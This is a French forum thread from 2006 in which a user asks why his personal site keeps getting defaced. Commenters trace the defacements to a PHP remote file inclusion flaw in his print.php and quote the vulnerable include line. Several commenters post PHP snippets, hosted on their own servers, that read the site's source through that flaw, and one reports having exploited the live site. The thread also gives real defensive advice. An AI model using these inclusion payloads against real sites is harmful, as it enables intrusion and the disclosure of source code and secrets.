Journal site perso hacké à plusieurs reprises

Posté par  .
Étiquettes : aucune
0
9
août
2006
cher petit journal, je suis victime d'un hacker qui me tourmente, sauras-tu me trouver une solution et une explication sur cet étrange phénomène ?

Ainsi donc, j'ai eu il y a quelques jours la page d'accueil de mon site "hackée" avec la mention "hacked by Crack_man", j'ai donc modifié le mot de passe en le choisissant plus complexe (pas de mots du dictionnaire + des chiffres), et ai restauré la page d'accueil. Mais ce soir j'ai vu que le site avait été de nouveau hacké, par le même, je ne vois vraiment pas comment cela peut être arrivé, d'autant plus que cela ne peut pas être un trojan ou autre virus (je suis sous linux), je n'ai apparemment pas de rootkit d'installé sur ma machine, n'ai pas d'ip fixe etc, en plus le "hack" semble vraiment amateur (cela ne veut rien dire car cela peut être un leurre, mais la page de garde a été faite apparemment avec frontpage -- vengeance de jvachez ? --)

si cela peut vous amuser d'aller voir : http://anamnese.online.fr (en attendant que je rétablisse le truc, si je peux...)

Des idées sur ce qui aurait pu se passer ?
  • # s/hacker/script kiddy/

    Posté par  (site web personnel) . Évalué à 7.

    http://fr.wikipedia.org/wiki/Script_kiddies
    Je ne suis pas trop pour avoir mis les black-hats dans http://fr.wikipedia.org/wiki/Hacker pour moi ce sont des crackers http://fr.wikipedia.org/wiki/Cracker_%28d%C3%A9plombeur_de_l(...) (no non déplombeur de logiciels ça ne me va pas non plus :/)

    bon et t'as quoi comme CMS en temps normal ?
    • [^] # Re: s/hacker/script kiddy/

      Posté par  (site web personnel) . Évalué à 6.

      d'après http://www.google.fr/search?hl=fr&lr=&q=link:q9M_Let(...) tu as un print.php (sans doute avec une vulnérabilité), quelqu'un qui s'est amusé à faire tourner wapiti sur ton site :p ? https://linuxfr.org/2006/08/03/21163.html

      le mieux est de regarder dans tes logs pour voir les requêtes bizarres qui seraient passées...
      • [^] # Re: s/hacker/script kiddy/

        Posté par  . Évalué à 4.

        oui, un hacker le terme est sans doute trop fort, par contre le site a bien été cracké. La première fois c'était une page statique, en html tout simple, qui redirigeait vers le site temporaire (celui qui est maintenant hacké, ou "scripté"). La seconde fois, après mon changement de mot de passe, c'était sur une page en php, mais qui fonctionne sans base sql (ce n'est pas un cms, c'est un développement perso). Par contre ce que tu me dis me met la puce à l'oreille, en fait je viens de voir que le changement de mot de passe affecte également celui de la base sql, et j'avais testé pas mal de trucs en php + mysql, genre wikini, wordpress, mediawiki etc, et je les ai laissés sur le site, il est possible que quelqu'un ai utilisé une faille de wikini par exemple pour charger ses fichiers à la place de mes idex, je viens de voir en plus que le wikini est tout "abimé" et il ne me semble pas y avoir touché :

        http://anamnese.online.fr/wikini/wakka.php "Pour des raisons indépendantes de notre volonté, le contenu de ce Wiki est temporairement inaccessible. Veuillez réessayer ultérieurement, merci de votre compréhension."

        donc soit le cracker peut charger ses fichiers sans connaitre mes mots de passe (ce qui me rassure un peu), soit il a pu récupérer mes mots de passe via une faille dans un des modules php+mysql qui dormaient là.

        Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

        • [^] # Re: s/hacker/script kiddy/

          Posté par  (site web personnel) . Évalué à 5.

          t'as maté les logs de connexion ? histoire de trouver des requêtes bizarres...

          Tu peux essayer de renommer tous tes répertoires à la racine de ton site pour isoler le problème. Si une page html statique se fait de nouveau cracker, c'est que le script kiddy utilise une vulnérabilité du serveur et non de ton site web :/
      • [^] # Re: s/hacker/script kiddy/

        Posté par  (site web personnel) . Évalué à 10.

        Effectivement, c'est une erreur de débutant (sans vouloir te vexer).
        Apparament on peut executer n'importe quoi sur ton serveur :
        http://anamnese.online.fr/site2/print.php?id=http://serveurd(...)
        • [^] # Re: s/hacker/script kiddy/

          Posté par  (site web personnel) . Évalué à 10.

          http://anamnese.online.fr/site2/hello.txt
          (le plus long était de creer un compte sur voila...)
          • [^] # Re: s/hacker/script kiddy/

            Posté par  (site web personnel) . Évalué à 6.

            arf j'ai oublié.
            Si tu as besoin d'aide, je veux bien essayer de t'aider meme si je n'ai pas vraiment touché au php depuis la seconde.

            N'hesite pas à me contacter sur Jabber : maxime AT im.apinc.org ou par mail maxime81@gmail.com
        • [^] # Re: s/hacker/script kiddy/

          Posté par  (site web personnel) . Évalué à 7.

          c'est ce que l'on apelle une faille phpinclude je crois :
          dans ton print.php elle se situe la :

          <? if ($_GET['page'] != "" ) { include("page$page.php"); } else { include("$id.php"); } ?>

          On peux donc inclure ce qu'on veux.
          Si tu n'inclue que des fichiers locaux une petite correction serai de faire :
          <? if ($_GET['page'] != "" ) { include("./page$page.php"); } else { include("./$id.php"); } ?>

          Comme ca ca forcerai le script a ne lire que des fichiers locaux. En attandant de trouver mieux car mon niveau de php n'est pas très élevé

          S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.

          • [^] # Re: s/hacker/script kiddy/

            Posté par  (site web personnel) . Évalué à 4.

          • [^] # Re: s/hacker/script kiddy/

            Posté par  . Évalué à 2.

            félicitation !
            Il faut que je modifie ce script en conséquence, en attendant je l'ai désactivé.

            Mais comment as-tu fait pour pouvoir visualiser le code en php ??
            Je croyais que le php était forcément exécuté par le serveur et que l'on ne pouvait pas le visionner. Cela veut dire que si là-dedans il y avait un code avec accès à une base tu pourrais tout lire ?

            Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

            • [^] # Re: s/hacker/script kiddy/

              Posté par  . Évalué à 6.

              Bah si tu fais un script qui affiche le contenu de ton fichier c'est facile.
              1. tu héverges ce contenu dans un fichier, par exemple, http://monsite/show.txt
              contenant ceci:
              <?php
              echo htmlentities(implode('',file('print.php'));
              ?php>

              puis dans un navigateur tu mets, http://anamnese.online.fr/site2/print.php?id=http://monsite/(...)

              Et là t'as,le fichier qui s'affiche en clair.
              • [^] # Re: s/hacker/script kiddy/

                Posté par  . Évalué à 4.

                Désolé pour les fautes -_-
                <?php
                echo htmlentities(implode('',file('print.php')));
                ?>
              • [^] # Re: s/hacker/script kiddy/

                Posté par  (site web personnel) . Évalué à 2.

                Tiens, comment tu as fait pour que ca execute ta page qui ne porte pas la bonne extention ? (je veux dire que normalement il rajoute .php à la fin de l'url...)
                C'est pour ca d'ailleur que je me suis inscrit chez voila qui n'execute pas le php et qui me permet de laisser l'extention .php à mon fichier.
                • [^] # Re: s/hacker/script kiddy/

                  Posté par  (site web personnel) . Évalué à 3.

                  la commande include ne regarde pas l'extension

                  et pour un site qui aurait fait include ( "$page .php" );

                  eh bien tu commence sur ta page malicieuse par
                  <?php echo "<?php"; ?>
                  • [^] # Re: s/hacker/script kiddy/

                    Posté par  (site web personnel) . Évalué à 2.

                    la commande ici n'est-elle pas : include("$id.php"); ?
                    qui inclue donc la fin du nom de fichier.

                    Ensuite j'ai pas compris l'interet de commencer la page par <?php echo "<?php"; ?>
                    • [^] # Re: s/hacker/script kiddy/

                      Posté par  (site web personnel) . Évalué à 3.

                      effectivement, j'avais pas regardé le code dans ce cas si.

                      Soit le fichier PHP suivant:

                      ---------- http://monsite.com/script.php --------------
                      <?php echo "<?php"; ?>
                      echo htmlentities(implode('',file('print.php')));
                      ?>
                      ---------------------------------------------------------------

                      Eh bien quand tu fera
                      http://victime.com/print.php?id=http://monsite.com/script
                      le echo "<?php"; sera interprété sur monsite.com
                      et le htmlentities sera interprété sur victime.com

                      Tu comprends mieux ? Enfin moi ça me parait logique.
            • [^] # Re: s/hacker/script kiddy/

              Posté par  (site web personnel) . Évalué à 5.

              C'est simple, mon pc perso n'execute pas php donc je me suis fait un script php sur mon serveur apache contenant :
              <?php
              $fp=fopen("./print.php","r");
              while (!feof($fp))
              {
              $tmp=fgets($fp,4096);
              $tmp=str_replace("<","<",$tmp);
              echo "$tmp";
              }
              fclose($fp);
              ?>

              et je l'ai lancé comme dit précédemment avec l'ip de mon pc et le nom du script sans .php comme ca il a été executé dans ton fichier print.php

              Donc j'ai utilisé ta faille pour te l'exposer :)

              S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.

  • # Sympa le code source

    Posté par  . Évalué à 3.



    hacked

    Pas très l33t tout ça ... ;)

    M
    • [^] # Re: Sympa le code source

      Posté par  . Évalué à 10.

      Merdeouille ... templite il a interprété le hacheteumeuleu !
      Je disais donc ...

      <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
      <meta name="ProgId" content="FrontPage.Editor.Document">
      <title>hacked</title>
  • # Rah lala...

    Posté par  . Évalué à 10.

    Mais ce soir j'ai vu que le site avait été de nouveau hacké, par le même, je ne vois vraiment pas comment cela peut être arrivé, d'autant plus que cela ne peut pas être un trojan ou autre virus (je suis sous linux)

    Moi je te propose le a-b-c de la securite, en commencant par a :

    a) Ne jamais presupposer quoi que ce soit
    Typiquement, dans le cas present, ta supposition est fausse
    b) Jeter un oeil a tout ce qui est logs(en esperant que le gars est pas assez fute pour les avoir modifie) et essayer de trouver par exemple dans les logs Apache une suite d'attaques n'ayant pas fonctionne, jusqu'a celle qui a fonctionne, dans syslog qui s'est logge et a quel heure,...
    c) Faire une liste des softs dispos de l'exterieur(blog php, apache, ssh, ...) et zieuter si il y a pas une difference entre la version que t'as et la derniere version patchee
    d) Au pire et si t'as du temps a perdre, transformes ta machine en un mini honeynet(sauve tes donnees avant), change ta page ton mot de passe comme si de rien n'etait, et attends que ca recommence.
    e) Il t'es fortement conseille de reinstaller la machine si possible, avoir l'impression qu'il n'y a pas de rootkit ou autre backdoor est une chose, en etre sur en est une autre
    • [^] # Re: Rah lala...

      Posté par  . Évalué à 3.

      le site étant hébergé chez free.fr , je n'ai pas possibilité de consulter les logs. Je reconnais que je n'ai pas très bien présenté la chose : je voulais dire que cela ne pouvait pas être un genre de reniffleur de mot de passe installé sur une machine windows qui aurait pu renvoyer mes nouveaux identifiants au cracker (que j'ai tapés en étant sous linux). Des rootkits sous linux, cela existe, mais pas à ma connaissance qui pourraient faire ce genre de chose aussi facilement que sous windows. En plus je n'ai pas d'ip fixe, et l'ordinateur est derrière une passerelle (impossible de faire ssh dessus).

      Pour les rootkit, c'est vrai que si mon ordinateur servait les fichiers sur internet, ce n'est pas en utilisant chkrootkit que l'on pourrait être certain à 100% de ne pas être compromis, mais c'est déjà une indication (en le lançant si on trouve quelque chose on peut être sûr que la machine est compromise). Mais le risque est quand même faible (cf. plus haut, pas de connection directe sur l'extérieur)
      Les crackers n'ont pas toujours le temps ou les capacités de faire une compromission dans les règles de l'art, qui ne laissent pas de traces ni rien. Par exemple une fois j'en avait vu qui s'étaient infiltrés sur une machine et qui avaient eu juste le temps de wget une archive bourrée de scripts pour scanner d'autres machines, leur but étant sans doute de se constituer une armée de machines zombies qui ne sont pas bien surveillées pour opérer tranquillement.

      Quoi qu'il en soit, je pencherais plutôt, comme vu plus haut, à une faille dans les modules php+mysql que j'avais négligés de retirer sur mon site, sans doute pour wikini, puisque le reste n'utilise pas de base. Ou alors à une faille dans mes inclusions php qui permettraient de charger des fichiers sur le serveur sans utiliser de mot de passe ?

      Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

      • [^] # Re: Rah lala...

        Posté par  . Évalué à 4.

        Il y a quelques incohérences dans ce que tu dis!

        S'il est hébergé par free.fr, comment peut-il avoir une adresse ip dynamique?

        S'il a une adresse ip dynamique, cela signifie que c'est un hébergement perso donc tu peux avoir accès facilement aux logs apache...

        Merci d'éclairer notre lanterne :)
        • [^] # Re: Rah lala...

          Posté par  . Évalué à 4.

          en fait ma connexion internet = ip dynamique

          l'hébergement du site = ip fixe, mais je ne sais même pas si on peut accéder au site par l'ip (par exemple la résolution donne l'adresse 212.27.63.124 mais on ne peut le visualiser via cette adresse )

          Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

          • [^] # Re: Rah lala...

            Posté par  . Évalué à 2.

            Peut etre ( surement ) un serveur qui heberge plusieur host.

            Peut etre du virtual hosting...?
      • [^] # Re: Rah lala...

        Posté par  . Évalué à 9.

        je voulais dire que cela ne pouvait pas être un genre de reniffleur de mot de passe installé sur une machine windows qui aurait pu renvoyer mes nouveaux identifiants au cracker (que j'ai tapés en étant sous linux). Des rootkits sous linux, cela existe, mais pas à ma connaissance qui pourraient faire ce genre de chose aussi facilement que sous windows

        Je te l'ai dit, pas de suppositions...

        http://sourceforge.net/projects/lkl/

        Ca m'a pris exactement 10 secondes a trouver avec Google, je t'expliques pas ce que je trouverais en cherchant 5 minutes...

        En plus je n'ai pas d'ip fixe, et l'ordinateur est derrière une passerelle (impossible de faire ssh dessus).

        Ah mais qui te dit que la faille est venue a toi ? Si ca se trouve tu browsais le web avec Firefox, tu t'es fais avoir par une faille la-dedans et l'exploit a installe un keylogger, un lance un shell qui s'est connecte depuis ta machine sur un channel IRC d'ou il a pris des instructions pour envoyer ton mot de passe sur un e-mail, ...
        T'as pas idee du genre de trucs que ces gens la font, il y a les script kiddies, et il y a aussi les gros reseaux ayant de temps en temps des liens avec le crime organise(et oui, ces trucs la ca peut payer bcp d'argent...) et des gens tres tres competents.

        Les crackers n'ont pas toujours le temps ou les capacités de faire une compromission dans les règles de l'art, qui ne laissent pas de traces ni rien

        Pas toujours, tu sais si dans ton cas il a eu le temps ? Non tu sais pas, donc tu assumes le pire, pas le meilleur, sinon t'es parti pour te faire entuber a chaque fois.

        Quoi qu'il en soit, je pencherais plutôt, comme vu plus haut, à une faille dans les modules php+mysql que j'avais négligés de retirer sur mon site, sans doute pour wikini, puisque le reste n'utilise pas de base. Ou alors à une faille dans mes inclusions php qui permettraient de charger des fichiers sur le serveur sans utiliser de mot de passe ?

        Il y a des chances, et il y a aussi des chances qu'il ait laisse de quoi revenir, auquel cas patcher la machine ne changera rien au probleme...
        Le honeynet a l'avantage que tu sauras ce qui s'est passe et ce que le gars a fait(si ca t'interesse), formatter a l'avantage que tu es 100% sur que plus rien de nocif est present sur ta machine.
        • [^] # Re: Rah lala...

          Posté par  . Évalué à -1.

          Voilà.
          * Soit il s'est fait piquer le mdp (piratage de sa machine nulix, écoute sur le résal (vive le ftp avec ses mdp en clair)
          * Soit il faudrait qu'il apprenne à programmer en PHP sans créer une faille de sécu toutes les 3 lignes, ou qu'il fasse attention à suivre les failles des packets qu'il utilise pour mettre en jour en cas de besoin.
          * Sinon c'est la cabale
        • [^] # Re: Rah lala...

          Posté par  (site web personnel) . Évalué à -7.

          > Ca m'a pris exactement 10 secondes a trouver avec Google, je t'expliques pas ce que je trouverais en cherchant 5 minutes...

          Perds encore 5 minutes, histoire de voir.

          > Ah mais qui te dit que la faille est venue a toi ? Si ca se trouve tu browsais le web avec Firefox, tu t'es fais avoir par une faille la-dedans et l'exploit a installe un keylogger, un lance un shell qui s'est connecte depuis ta machine sur un channel IRC d'ou il a pris des instructions pour envoyer ton mot de passe sur un e-mail, ...

          Ah le maleureux si seulement il utilisait Internet Explorer il n'aurait pas ce genre de soucis.

          > T'as pas idee du genre de trucs que ces gens la font, il y a les script kiddies, et il y a aussi les gros reseaux ayant de temps en temps des liens avec le crime organise(et oui, ces trucs la ca peut payer bcp d'argent...) et des gens tres tres competents.

          Mais ça fait vraiment peur tout ça. Tu arrives quand même à dormir ?

          Il faut arréter de se croire persécuter et attaquer de partout.
  • # site perso hacké à plusieurs reprises

    Posté par  . Évalué à 10.

    Tout les jours je hacke mon site et tous les jours Alan Cox, Andrew Morton, etc hacke Linux.

    Tu voulais dire cracké et non hacké.
    • [^] # Re: site perso hacké à plusieurs reprises

      Posté par  . Évalué à 2.

      oui tu as raison. Dans mon esprit "cracké" voulait plutôt dire soit trouver le mot de passe, soit passer une protection vachement balaise, chose qu'il n'y avait pas dans la compromission en question :) (vu qu'il n'y avait pas de protection forte sur mon site ouvert à tout vent)

      Mais c'est vrai que cela n'est pas sympa pour les vrais hackers (cf http://fr.wikipedia.org/wiki/Hacker où on lit que cracker est bien dans le sens que tu donnes)

      Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

  • # petite conclusion

    Posté par  . Évalué à 6.

    tout d'abord, merci bien de vos réponses, merci également à celui qui m'a envoyé en message privé un lien vers une explication courte et claire sur le problème :

    http://www.supinfo-projects.com/fr/2005/faille%5Finclude%5Fp(...)

    ansi qu'à la personne qui a gentiment remplacé le site cracké par "site en maintenance" :)

    En fait j'étais au courant de ces problèmes d'include, expliqués sur le site du zéro où j'ai eu mes premières bases de php ( http://www.siteduzero.com/index.php ). J'avais sécurisé une partie des scripts comme indiqué sur le site du zéro. Pour la partie du print.php, je pense que j'avais dû essayer de le faire correctement, et puis comme cela avait dû me bloquer quelque part, j'ai lâché du lest et retiré les sécurités nécessaire.

    Je ne cherche pas à me justifier, justement ce que j'ai fait était bien idiot. Mais là où je tombe des nues c'est que je pensais qu'une telle faille pouvait proser problème s'il y avait une base sql seulement, je ne pouvais pas imaginer que cela permettait de faire tout cela sur le site, y compris de visualiser les codes php.

    Voilà, je me suis bien fait prendre et c'est moi le zéro... :)

    Only wimps use tape backup: real men just upload their important stuff on megaupload, and let the rest of the world ~~mirror~~ link to it

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.